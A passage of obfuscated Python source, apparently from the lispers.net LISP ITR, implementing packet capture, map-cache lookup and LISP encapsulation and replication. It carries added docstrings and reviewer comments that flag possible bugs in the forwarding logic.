    # With an external data-plane, no RLOC-probe capture threads needed.
    if ( ii1iIi1iIiI1i ) : return
    if 93 - 93: I1ii11iIi11i / iIii1I11I1II1 * i1IIi % OoooooooOO * O0 * I11i
    if 64 - 64: II111iiii + O0 / iIii1I11I1II1 / Oo0Ooo . ooOoO0o % IiII
    if 50 - 50: iIii1I11I1II1 - IiII + OOooOOo
    if 69 - 69: O0
    if 85 - 85: ooOoO0o / O0
    # On the remaining (RLOC-only) interfaces capture just RLOC-probe
    # replies arriving from UDP port 4342.
    iI1iIIIi1i = "(udp src port 4342 and ip[28] == 0x28)"
    for Oo00OoOo in IIII1i :
        ii1 = [ Oo00OoOo , iI1iIIIi1i , i1iIIi1 ]
        lisp . lprint ( "Capture RLOC-probe replies on RLOC interface {}" . format ( Oo00OoOo ) )
        if 89 - 89: iIii1I11I1II1
        threading . Thread ( target = Oo0000oOo , args = ii1 ) . start ( )
    if 21 - 21: I11i % I11i
    return
if 27 - 27: i11iIiiIii / I1ii11iIi11i
if 84 - 84: Oo0Ooo
if 43 - 43: oO0o - OoooooooOO
if 3 - 3: O0 / iII111i
if 31 - 31: OOooOOo + o0oOOo0O0Ooo . OoooooooOO
if 89 - 89: II111iiii + i1IIi + II111iiii
if 7 - 7: O0 % o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - iII111i
def II1Ii11I111I ( ) :
    """Shut down the ITR: cancel the pending timer and close all sockets.

    Reads module globals (timer I11, socket pair II1iII1i, sockets i111I,
    II1Ii1iI1i, oO0oIIII, Oo0oO0oo0oO00) set up elsewhere in this file.
    """
    # Stop the periodic timer if one is outstanding.
    if ( I11 ) : I11 . cancel ( )

    # Close every socket; the second argument is the name passed to
    # lisp.lisp_close_socket ("" for the unnamed internal sockets).
    for ooO_sock , ooO_name in (
            ( II1iII1i [ 0 ] , "" ) ,
            ( II1iII1i [ 1 ] , "" ) ,
            ( i111I , "" ) ,
            ( II1Ii1iI1i , "" ) ,
            ( oO0oIIII , "lisp-itr" ) ,
            ( Oo0oO0oo0oO00 , "lispers.net-itr" ) ) :
        lisp . lisp_close_socket ( ooO_sock , ooO_name )
    return
if 3 - 3: II111iiii / OOooOOo + IiII . ooOoO0o . OoO0O00
if 83 - 83: oO0o + OoooooooOO
if 22 - 22: Ii1I % iII111i * OoooooooOO - o0oOOo0O0Ooo / iIii1I11I1II1
if 86 - 86: OoooooooOO . iII111i % OoOoOO00 / I11i * iII111i / o0oOOo0O0Ooo
if 64 - 64: i11iIiiIii
if 38 - 38: IiII / I1IiiI - IiII . I11i
if 69 - 69: OoooooooOO + I1ii11iIi11i
def O0oOo00o0 ( packet , device , input_interface , macs , my_sa ) :
    """ITR data-plane handler for one captured packet.

    Flow: (1) hand RLOC-probe replies to the control-plane; (2) decode
    the inner packet and qualify its source as a local EID (with
    dynamic-EID discovery); (3) look up the map-cache, sending a
    Map-Request on a miss; (4) natively forward, encapsulate to a
    unicast RLOC, or replicate over an RLE list for multicast.

    Args:
        packet: raw frame payload (link header already stripped).
        device: pcap device the frame arrived on.
        input_interface: interface derived from the destination MAC.
        macs: formatted MAC string for logging ("" when unavailable).
        my_sa: True when the source MAC is our own (loopback-style RX).

    NOTE: the 'if N - N:' lines are obfuscator no-ops.
    """
    global II1iII1i
    global iiI1iIiI
    global Ii1IIii11 , Oooo0000
    global oO0oIIII
    if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
    if 38 - 38: OoOoOO00 / iII111i % Oo0Ooo
    if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
    if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
    # If this is an RLOC-probe reply, lisp_is_rloc_probe returns a
    # modified buffer; pass it to the control-plane and stop.
    O0O0oOOo0O = packet
    packet , II11 , O00oooo00o0O , ii1iii1I1I = lisp . lisp_is_rloc_probe ( packet , 1 )
    if ( O0O0oOOo0O != packet ) :
        if ( II11 == None ) : return
        lisp . lisp_parse_packet ( II1iII1i , packet , II11 , O00oooo00o0O , ii1iii1I1I )
        return
    if 95 - 95: IiII
    if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
    packet = lisp . lisp_packet ( packet )
    if ( packet . decode ( False , None , None ) == None ) : return
    if 72 - 72: oO0o + oO0o / II111iiii . OoooooooOO % Ii1I
    if 49 - 49: oO0o . OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
    if 2 - 2: OoooooooOO % OOooOOo
    if 63 - 63: I1IiiI % iIii1I11I1II1
    if 39 - 39: iII111i / II111iiii / I1ii11iIi11i % I1IiiI
    if 89 - 89: I1Ii111 + OoooooooOO + I1Ii111 * i1IIi + iIii1I11I1II1 % I11i
    # Frame sourced by us: treat the pcap device as the input interface.
    if ( my_sa ) : input_interface = device
    if 59 - 59: OOooOOo + i11iIiiIii
    if 88 - 88: i11iIiiIii - ooOoO0o
    if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
    if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
    # Stamp both inner addresses with the instance-ID configured for the
    # input interface.
    Iii = packet . inner_source
    OO00Oo = lisp . lisp_get_interface_instance_id ( input_interface , Iii )
    packet . inner_dest . instance_id = OO00Oo
    packet . inner_source . instance_id = OO00Oo
    if 20 - 20: o0oOOo0O0Ooo / i1IIi
    if 71 - 71: OoOoOO00 . i1IIi
    if 94 - 94: OOooOOo . I1Ii111
    if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
    if ( macs != "" ) : macs = ", MACs: " + macs + ","
    packet . print_packet ( "Receive {}{}" . format ( device , macs ) , False )
    if 47 - 47: OoooooooOO
    if 4 - 4: I1IiiI % I11i
    if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
    if 82 - 82: ooOoO0o + II111iiii
    # Frame was not addressed to a MAC of this pcap device — ignore it.
    if ( device != input_interface and device != "lispers.net" ) :
        lisp . dprint ( "Not our MAC address on interface {}, pcap interface {}" . format ( input_interface , device ) )
        if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
        return
    if 68 - 68: Oo0Ooo + i11iIiiIii
    if 69 - 69: iIii1I11I1II1 * iIii1I11I1II1 * i11iIiiIii + I1IiiI / OOooOOo % Ii1I
    # "Decent push" mode: locally sourced multicast bypasses the source
    # EID check below.
    O0OO0oOoO0O0O = lisp . lisp_decent_push_configured
    if ( O0OO0oOoO0O0O ) :
        oo000oOo0 = packet . inner_dest . is_multicast_address ( )
        iIiI1I1Ii = packet . inner_source . is_local ( )
        O0OO0oOoO0O0O = ( iIiI1I1Ii and oo000oOo0 )
    if 50 - 50: OoO0O00 . i11iIiiIii - oO0o . oO0o
    if 31 - 31: OOooOOo / Oo0Ooo * i1IIi . OoOoOO00
    if ( O0OO0oOoO0O0O == False ) :
        if 57 - 57: OOooOOo + iIii1I11I1II1 % i1IIi % I1IiiI
        if 83 - 83: o0oOOo0O0Ooo / i11iIiiIii % iIii1I11I1II1 . I11i % oO0o . OoooooooOO
        if 94 - 94: Ii1I + iIii1I11I1II1 % OoO0O00
        if 93 - 93: Ii1I - OOooOOo + iIii1I11I1II1 * o0oOOo0O0Ooo + I1Ii111 . iII111i
        # Drop packets whose source is not one of our configured EIDs.
        Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_source , False )
        if ( Oo0ooOo0o == None ) :
            lisp . dprint ( "Packet received from non-EID source" )
            return
        if 49 - 49: OoooooooOO * I11i - Oo0Ooo . oO0o
        if 89 - 89: ooOoO0o + Ii1I * ooOoO0o / ooOoO0o
        if 46 - 46: OoO0O00
        if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
        if 35 - 35: OOooOOo * o0oOOo0O0Ooo * I1IiiI % Oo0Ooo . OoOoOO00
        # Dynamic-EID discovery: register the source EID if the interface
        # allows it; otherwise drop.
        if ( Oo0ooOo0o . dynamic_eid_configured ( ) ) :
            O00o00O = lisp . lisp_allow_dynamic_eid ( input_interface ,
                packet . inner_source )
            if ( O00o00O ) :
                lisp . lisp_itr_discover_eid ( Oo0ooOo0o , packet . inner_source ,
                    input_interface , O00o00O , oO0oIIII )
            else :
                ii1iii11i1 = lisp . green ( packet . inner_source . print_address ( ) , False )
                lisp . dprint ( "Disallow dynamic-EID {} on interface {}" . format ( ii1iii11i1 ,
                    input_interface ) )
                return
    if 4 - 4: IiII . IiII % I1ii11iIi11i % Ii1I / Ii1I
    if 29 - 29: Oo0Ooo * ooOoO0o * I1ii11iIi11i / i11iIiiIii
    if 26 - 26: IiII % I1Ii111 % oO0o % Ii1I
    # Locally sourced LISP control traffic is not encapsulated.
    if ( packet . inner_source . is_local ( ) and
        packet . udp_dport == lisp . LISP_CTRL_PORT ) : return
    if 55 - 55: ooOoO0o % OoooooooOO / OoooooooOO % OoooooooOO
    if 52 - 52: I1ii11iIi11i + I1ii11iIi11i . II111iiii
    if 34 - 34: OoooooooOO . O0 / oO0o * OoOoOO00 - I1ii11iIi11i
    if 36 - 36: i1IIi / O0 / OoO0O00 - O0 - i1IIi
    if 22 - 22: i1IIi + Ii1I
    # Validate the inner header and decrement its TTL per version.
    if ( packet . inner_version == 4 ) :
        O0o0O0OO00o , packet . packet = lisp . lisp_ipv4_input ( packet . packet )
        if ( packet . packet == None ) : return
        packet . inner_ttl -= 1
    elif ( packet . inner_version == 6 ) :
        packet . packet = lisp . lisp_ipv6_input ( packet )
        if ( packet . packet == None ) : return
        packet . inner_ttl -= 1
    else :
        packet . packet = lisp . lisp_mac_input ( packet . packet )
        if ( packet . packet == None ) : return
        packet . encap_port = lisp . LISP_L2_DATA_PORT
    if 92 - 92: o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % OoO0O00 % IiII . OoooooooOO
    if 52 - 52: ooOoO0o / i11iIiiIii - OOooOOo . IiII % iIii1I11I1II1 + o0oOOo0O0Ooo
    if 71 - 71: oO0o % I11i * OoOoOO00 . O0 / Ii1I . I1ii11iIi11i
    if 58 - 58: Oo0Ooo / oO0o
    if 44 - 44: OOooOOo
    if 54 - 54: Ii1I - I11i - I1Ii111 . iIii1I11I1II1
    # oo0O000OoO is a module-level flag not visible in this chunk —
    # presumably "xtr loopback" mode; TODO confirm.
    if ( oo0O000OoO == False ) :
        Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
        # NOTE(review): 'dynamic_eid_configured' here is a bound method
        # compared to False (no call parentheses), so this condition is
        # never true and this native-forward branch never runs — verify
        # against upstream lisp-itr.py whether '()' was intended.
        if ( Oo0ooOo0o and Oo0ooOo0o . dynamic_eid_configured == False ) :
            lisp . dprint ( ( "Packet destined to local EID-prefix {}, " + "natively forwarding" ) . format ( Oo0ooOo0o . print_eid_tuple ( ) ) )
            if 79 - 79: Ii1I . OoO0O00
            packet . send_packet ( Ii1IIii11 , packet . inner_dest )
            return
    if 40 - 40: o0oOOo0O0Ooo + Oo0Ooo . o0oOOo0O0Ooo % ooOoO0o
    if 15 - 15: Ii1I * Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 - i11iIiiIii
    if 60 - 60: I1IiiI * I1Ii111 % OoO0O00 + oO0o
    if 52 - 52: i1IIi
    if 84 - 84: Ii1I / IiII
    if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
    IiIIiIIIiIii = lisp . lisp_map_cache_lookup ( packet . inner_source , packet . inner_dest )
    if ( IiIIiIIIiIii ) : IiIIiIIIiIii . add_recent_source ( packet . inner_source )
    if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
    if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
    if 8 - 8: o0oOOo0O0Ooo
    if 4 - 4: I1ii11iIi11i + I1ii11iIi11i * ooOoO0o - OoOoOO00
    if 78 - 78: Ii1I / II111iiii % OoOoOO00
    if 52 - 52: OOooOOo - iII111i * oO0o
    if 17 - 17: OoooooooOO + OOooOOo * I11i * OoOoOO00
    # Secondary instance-ID retry: on native-forward action, redo the
    # lookup in the database's secondary IID.
    # NOTE(review): Oo0ooOo0o is only bound on the paths above that
    # assigned it; if both O0OO0oOoO0O0O and oo0O000OoO were true this
    # line would raise NameError — verify those flags are exclusive.
    iiIii1I = Oo0ooOo0o . secondary_iid if ( Oo0ooOo0o != None ) else None
    if ( iiIii1I and IiIIiIIIiIii and IiIIiIIIiIii . action == lisp . LISP_NATIVE_FORWARD_ACTION ) :
        i1I11iIiII = packet . inner_dest
        i1I11iIiII . instance_id = iiIii1I
        IiIIiIIIiIii = lisp . lisp_map_cache_lookup ( packet . inner_source , i1I11iIiII )
        if ( IiIIiIIIiIii ) : IiIIiIIIiIii . add_recent_source ( packet . inner_source )
    if 66 - 66: Oo0Ooo - o0oOOo0O0Ooo * IiII + OoOoOO00 + o0oOOo0O0Ooo - iIii1I11I1II1
    if 17 - 17: oO0o
    if 22 - 22: I11i + iIii1I11I1II1
    if 24 - 24: OoOoOO00 % i1IIi + iII111i . i11iIiiIii . I1ii11iIi11i
    if 17 - 17: I1ii11iIi11i . II111iiii . ooOoO0o / I1ii11iIi11i
    # Map-cache miss (or a miss/pubsub action): rate-limited Map-Request,
    # optionally record in the trace, then drop the packet.
    if ( IiIIiIIIiIii == None or lisp . lisp_mr_or_pubsub ( IiIIiIIIiIii . action ) ) :
        if ( lisp . lisp_rate_limit_map_request ( packet . inner_dest ) ) : return
        if 57 - 57: I11i
        oO0 = ( IiIIiIIIiIii and IiIIiIIIiIii . action == lisp . LISP_SEND_PUBSUB_ACTION )
        lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
            packet . inner_source , packet . inner_dest , None , oO0 )
        if 87 - 87: oO0o % Ii1I
        if ( packet . is_trace ( ) ) :
            lisp . lisp_trace_append ( packet , reason = "map-cache miss" )
        if 83 - 83: II111iiii - I11i
        return
    if 35 - 35: i1IIi - iIii1I11I1II1 + i1IIi
    if 86 - 86: iIii1I11I1II1 + OoOoOO00 . i11iIiiIii - Ii1I
    if 51 - 51: OoOoOO00
    if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
    if 53 - 53: Ii1I % Oo0Ooo
    if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
    # TTL-elapsed active entry: refresh it in the background with a new
    # (rate-limited) Map-Request while still forwarding this packet.
    if ( IiIIiIIIiIii and IiIIiIIIiIii . is_active ( ) and IiIIiIIIiIii . has_ttl_elapsed ( ) ) :
        if ( lisp . lisp_rate_limit_map_request ( packet . inner_dest ) == False ) :
            lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( IiIIiIIIiIii . print_eid_tuple ( ) , False ) ) )
            if 41 - 41: Ii1I % I1ii11iIi11i
            lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
                packet . inner_source , packet . inner_dest , None )
    if 12 - 12: OOooOOo
    if 69 - 69: OoooooooOO + OOooOOo
    if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
    if 31 - 31: I11i % OOooOOo * I11i
    if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
    if 1 - 1: iIii1I11I1II1
    if 93 - 93: i1IIi . i11iIiiIii . Oo0Ooo
    # Account the hit and pick an RLOC (or RLE) for encapsulation.
    IiIIiIIIiIii . last_refresh_time = time . time ( )
    IiIIiIIIiIii . stats . increment ( len ( packet . packet ) )
    if 99 - 99: I11i - I1Ii111 - oO0o % OoO0O00
    if 21 - 21: II111iiii % I1ii11iIi11i . i1IIi - OoooooooOO
    if 4 - 4: OoooooooOO . ooOoO0o
    if 78 - 78: I1ii11iIi11i + I11i - O0
    i1I1iIi1IiI , i1111 , O0O000OOOo , i11ii1Ii1 , i1i1II1i11 , o00o = IiIIiIIIiIii . select_rloc ( packet , oO0oIIII )
    if 21 - 21: OoooooooOO - iIii1I11I1II1
    if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
    # No unicast RLOC and no RLE: either natively forward or drop.
    if ( i1I1iIi1IiI == None and i1i1II1i11 == None ) :
        if ( i11ii1Ii1 == lisp . LISP_NATIVE_FORWARD_ACTION ) :
            lisp . dprint ( "Natively forwarding" )
            packet . send_packet ( Ii1IIii11 , packet . inner_dest )
            if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
            if ( packet . is_trace ( ) ) :
                lisp . lisp_trace_append ( packet , reason = "not an EID" )
            if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
            return
        if 62 - 62: i1IIi - OoOoOO00
        oo0O0oo = "No reachable RLOCs found"
        lisp . dprint ( oo0O0oo )
        if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet , reason = oo0O0oo )
        return
    if 14 - 14: O0 / i1IIi / Oo0Ooo + iIii1I11I1II1
    # A null RLOC encodes an explicit drop action.
    if ( i1I1iIi1IiI and i1I1iIi1IiI . is_null ( ) ) :
        oo0O0oo = "Drop action RLOC found"
        lisp . dprint ( oo0O0oo )
        if 96 - 96: iII111i
        if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet , reason = oo0O0oo )
        return
    if 18 - 18: iII111i * I11i - Ii1I
    if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
    if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
    if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
    if 39 - 39: iIii1I11I1II1 - OoooooooOO
    # Build the outer header fields.
    # NOTE(review): O0o0O0OO00o is only assigned in the IPv4 branch above;
    # for IPv6/MAC packets this read would raise NameError unless the name
    # also exists at module scope — verify against upstream lisp-itr.py.
    packet . outer_tos = packet . inner_tos
    packet . outer_ttl = 32 if ( O0o0O0OO00o ) else packet . inner_ttl
    if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
    if 23 - 23: II111iiii / oO0o
    if 28 - 28: Oo0Ooo * ooOoO0o - OoO0O00
    if 19 - 19: I11i
    # Unicast encapsulation to the selected RLOC.
    if ( i1I1iIi1IiI ) :
        packet . outer_dest . copy_address ( i1I1iIi1IiI )
        Ooooo0OoO0 = packet . outer_dest . afi_to_version ( )
        packet . outer_version = Ooooo0OoO0
        iI1 = lisp . lisp_myrlocs [ 0 ] if ( Ooooo0OoO0 == 4 ) else lisp . lisp_myrlocs [ 1 ]
        if 31 - 31: oO0o / iIii1I11I1II1
        packet . outer_source . copy_address ( iI1 )
        if 84 - 84: OOooOOo
        if ( packet . is_trace ( ) ) :
            if ( lisp . lisp_trace_append ( packet , rloc_entry = o00o ) == False ) : return
        if 87 - 87: ooOoO0o + o0oOOo0O0Ooo
        if 28 - 28: OOooOOo * I1ii11iIi11i / oO0o
        if 64 - 64: oO0o - I1IiiI / iII111i - OoO0O00
        if 37 - 37: i11iIiiIii / iII111i
        if 85 - 85: i11iIiiIii + I1Ii111 * OoOoOO00
        if 1 - 1: i1IIi / Oo0Ooo . OoO0O00
        # Encode (encrypting with O0O000OOOo when set) and transmit on the
        # version-appropriate raw socket.
        if ( packet . encode ( O0O000OOOo ) == None ) : return
        if ( len ( packet . packet ) <= 1500 ) : packet . print_packet ( "Send" , True )
        if 57 - 57: I11i . Oo0Ooo + II111iiii
        if 43 - 43: I1Ii111 % iII111i
        if 69 - 69: iII111i % OoO0O00
        if 86 - 86: oO0o / oO0o
        IiiI = Oooo0000 if Ooooo0OoO0 == 6 else Ii1IIii11
        packet . send_packet ( IiiI , packet . outer_dest )
        if 19 - 19: II111iiii
    # Multicast replication: send one copy per RLE node at the first
    # node's replication level.
    elif ( i1i1II1i11 ) :
        if 72 - 72: OoooooooOO / I1IiiI + Ii1I / OoOoOO00 * Ii1I
        if 34 - 34: O0 * O0 % OoooooooOO + iII111i * iIii1I11I1II1 % Ii1I
        if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
        if 32 - 32: i11iIiiIii - I1Ii111
        if 53 - 53: OoooooooOO - IiII
        oOo = i1i1II1i11 . rle_nodes [ 0 ] . level
        i1i = len ( packet . packet )
        for IIIiiiI in i1i1II1i11 . rle_forwarding_list :
            if ( IIIiiiI . level != oOo ) : return
            if 94 - 94: O0 - I11i - iIii1I11I1II1 % ooOoO0o / Ii1I % iII111i
            packet . outer_dest . copy_address ( IIIiiiI . address )
            # Decent-push multicast uses the wildcard instance-ID.
            if ( O0OO0oOoO0O0O ) : packet . inner_dest . instance_id = 0xffffff
            Ooooo0OoO0 = packet . outer_dest . afi_to_version ( )
            packet . outer_version = Ooooo0OoO0
            iI1 = lisp . lisp_myrlocs [ 0 ] if ( Ooooo0OoO0 == 4 ) else lisp . lisp_myrlocs [ 1 ]
            if 44 - 44: Oo0Ooo % iIii1I11I1II1
            packet . outer_source . copy_address ( iI1 )
            if 90 - 90: II111iiii + OoooooooOO % OoooooooOO
            if ( packet . is_trace ( ) ) :
                if ( lisp . lisp_trace_append ( packet ) == False ) : return
            if 35 - 35: iII111i / I1ii11iIi11i * OoooooooOO . II111iiii / Oo0Ooo
            if 1 - 1: OoooooooOO + IiII . i1IIi % I11i
            if ( packet . encode ( None ) == None ) : return
            if 66 - 66: o0oOOo0O0Ooo + I1ii11iIi11i + I1IiiI - oO0o
            if 12 - 12: iII111i . IiII . OoOoOO00 / O0
            if 58 - 58: o0oOOo0O0Ooo - II111iiii % oO0o + I1Ii111 . OoOoOO00 / IiII
            if 8 - 8: I1ii11iIi11i . OoO0O00 * I11i + II111iiii % i11iIiiIii
            packet . print_packet ( "Replicate-to-L{}" . format ( IIIiiiI . level ) , True )
            packet . send_packet ( Ii1IIii11 , packet . outer_dest )
            if 8 - 8: ooOoO0o * O0
            if 73 - 73: o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
            if 11 - 11: OoOoOO00 + IiII - OoooooooOO / OoO0O00
            if 34 - 34: ooOoO0o
            if 45 - 45: ooOoO0o / Oo0Ooo / Ii1I
            # encode() prepended outer headers; strip them so the next
            # replica re-encapsulates the original inner packet.
            IIi11i1II = len ( packet . packet ) - i1i
            packet . packet = packet . packet [ IIi11i1II : : ]
    if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
    if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
    if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
    if 58 - 58: I1IiiI - I1ii11iIi11i % O0 . I1IiiI % OoO0O00 % IiII
    if 87 - 87: oO0o - i11iIiiIii
    if 78 - 78: i11iIiiIii / iIii1I11I1II1 - o0oOOo0O0Ooo
    del ( packet )
    return
if 23 - 23: I11i
if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
if 14 - 14: I1ii11iIi11i
if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
def I11i1iIiiIiIi ( device , not_used , packet ) :
    """pcap callback: strip the link-layer header and hand the packet to
    the data-plane handler O0oOo00o0().

    Args:
        device: capture interface name ("lo0" = 4-byte loopback header,
            "lispers.net" = no header, anything else = 14-byte Ethernet).
        not_used: unused pcap callback argument.
        packet: raw captured frame bytes.

    NOTE: the 'if N - N:' lines are obfuscator no-ops.
    """
    # I1i = link-header length to strip before the IP header.
    I1i = 4 if device == "lo0" else 0 if device == "lispers.net" else 14
    if 59 - 59: OoooooooOO . Ii1I / O0 - OOooOOo
    if ( lisp . lisp_frame_logging ) :
        i1I1i = lisp . bold ( "Received frame on interface '{}'" . format ( device ) ,
            False )
        OO0o = lisp . lisp_format_packet ( packet [ 0 : 64 ] )
        lisp . lprint ( "{}: {}" . format ( i1I1i , OO0o ) )
    if 32 - 32: OoooooooOO - OoOoOO00 - i11iIiiIii * o0oOOo0O0Ooo / Oo0Ooo + OoooooooOO
    if 35 - 35: i1IIi - o0oOOo0O0Ooo * iII111i
    if 63 - 63: iII111i * I1ii11iIi11i . OoooooooOO / OOooOOo * Oo0Ooo . ooOoO0o
    if 62 - 62: i1IIi / ooOoO0o . I1IiiI * o0oOOo0O0Ooo
    if 21 - 21: o0oOOo0O0Ooo
    # Ethernet frames: resolve the real input interface from the
    # destination MAC, format MACs for logging, and detect VLAN tags.
    O0Oo0 = ""
    o0oO0oo0000OO = False
    OOo0oO00ooO00 = device
    if ( I1i == 14 ) :
        iIiIIi1 , I1i1ii1IiIii , oOOO0O0Ooo , o0oO0oo0000OO = lisp . lisp_get_input_interface ( packet )
        OOo0oO00ooO00 = device if ( device in iIiIIi1 ) else iIiIIi1 [ 0 ]
        O0Oo0 = lisp . lisp_format_macs ( I1i1ii1IiIii , oOOO0O0Ooo )
        if ( OOo0oO00ooO00 . find ( "vlan" ) != - 1 ) : I1i += 4
        if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
        if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
        if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
        if 88 - 88: OoOoOO00 - i11iIiiIii % o0oOOo0O0Ooo * I11i + I1ii11iIi11i
        if 52 - 52: II111iiii . I1IiiI + OoOoOO00 % OoO0O00
        if 62 - 62: o0oOOo0O0Ooo
        # Low-order bit of the first MAC byte set => group (multicast/
        # broadcast) destination; treat like our own source address.
        if ( int ( oOOO0O0Ooo [ 1 ] , 16 ) & 1 ) : o0oO0oo0000OO = True
    if 15 - 15: I11i + Ii1I . OOooOOo * OoO0O00 . OoOoOO00
    if 18 - 18: i1IIi % II111iiii + I1Ii111 % Ii1I
    if 72 - 72: iIii1I11I1II1
    if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
    if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
    # Inspect the EtherType just before the payload: 0x8100 = 802.1Q tag
    # (skip 4 more bytes and name the vlan), 0x806 = ARP (drop).
    if ( I1i != 0 ) :
        oOo0OOoooO = struct . unpack ( "H" , packet [ I1i - 2 : I1i ] ) [ 0 ]
        oOo0OOoooO = socket . ntohs ( oOo0OOoooO )
        if ( oOo0OOoooO == 0x8100 ) :
            iIi1iIIIiIiI = struct . unpack ( "I" , packet [ I1i : I1i + 4 ] ) [ 0 ]
            iIi1iIIIiIiI = socket . ntohl ( iIi1iIIIiIiI )
            OOo0oO00ooO00 = "vlan" + str ( iIi1iIIIiIiI >> 16 )
            I1i += 4
        elif ( oOo0OOoooO == 0x806 ) :
            lisp . dprint ( "Dropping ARP packets, host should have default route" )
            return
    if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
    if 84 - 84: i11iIiiIii * OoO0O00
    if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
    # L2 overlays keep the MAC header: strip nothing.
    if ( lisp . lisp_l2_overlay ) : I1i = 0
    if 30 - 30: O0 + I1ii11iIi11i + II111iiii
    O0oOo00o0 ( packet [ I1i : : ] , device , OOo0oO00ooO00 , O0Oo0 , o0oO0oo0000OO )
    return
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
if 47 - 47: oO0o % iIii1I11I1II1
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
